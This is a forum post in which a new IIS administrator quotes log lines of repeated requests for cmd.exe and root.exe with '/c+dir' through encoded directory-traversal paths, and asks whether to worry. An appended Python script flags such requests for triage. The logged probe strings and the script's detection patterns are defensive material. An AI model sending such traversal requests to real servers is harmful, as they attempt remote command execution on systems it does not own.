Hi, I have just installed IIS and am looking over the logs. Oftentimes, I see something like the following lines (edited to protect the parties involved):
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 –.—.—.— – GET /scripts/root.exe /c+dir 401 –
2001-10-30 12:19:53 –.—.—.— – GET /MSADC/root.exe /c+dir 401 –
2001-10-30 12:19:56 –.—.—.— – GET /c/winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:19:59 –.—.—.— – GET /d/winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:02 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:06 –.—.—.— – GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:09 –.—.—.— – GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:12 –.—.—.— – GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:16 –.—.—.— – GET /scripts/..?../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:19 –.—.—.— – GET /scripts/winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:26 –.—.—.— – GET /winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:29 –.—.—.— – GET /winnt/system32/cmd.exe /c+dir 404 –
2001-10-30 12:20:32 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:20:45 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:21:38 –.—.—.— – GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 –
2001-10-30 12:21:41 –.—.—.— – GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 –
What is this person doing and is it something I need to be worried about? I have seen multiple people do things of a similar nature over the last 3 days and I’m not quite sure what it means.
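Added example, not part of the original post: one way to triage a log like the one quoted above is to read the #Fields header, decode each cs-uri-stem, and count requests that contain a decoded ../ or ..\ sequence or that target cmd.exe or root.exe, grouped by client and status code. The sample log, its 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the post's log format; addresses are placeholders.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 192.0.2.10 - GET /scripts/root.exe /c+dir 401 -
2001-10-30 12:20:02 192.0.2.10 - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:12 192.0.2.10 - GET /msadc/..%5c../winnt/system32/cmd.exe /c+dir401 -
2001-10-30 12:21:41 192.0.2.10 - GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:25:00 192.0.2.77 - GET /default.htm - 200 -
2001-10-30 12:26:10 192.0.2.77 - GET /docs/setup.exe - 200 -
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")  # "../" or "..\" once %2f / %5c are decoded
SHELL_TARGET = re.compile(r"/(cmd|root)\.exe$", re.I)

def parse(log_text):
    """Yield (record, None) for well-formed lines and (None, raw) for malformed ones."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log itself
        elif line and not line.startswith("#"):
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts)), None
            else:
                yield None, line  # e.g. two fields run together

def classify(stem):
    """Return the reasons a cs-uri-stem looks like a command-shell probe."""
    decoded = unquote(stem)
    checks = {"traversal": TRAVERSAL, "shell-target": SHELL_TARGET}
    return [name for name, rx in checks.items() if rx.search(decoded)]

def triage(log_text):
    """Count flagged requests per (client, status); collect unparseable lines."""
    hits, malformed = Counter(), []
    for rec, raw in parse(log_text):
        if rec is None:
            malformed.append(raw)
        elif classify(rec["cs-uri-stem"]):
            hits[(rec["c-ip"], rec["sc-status"])] += 1
    return hits, malformed

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

Grouping by status code separates requests the server refused (401) or could not find (404) from any flagged request answered with 200, which is the case to investigate first.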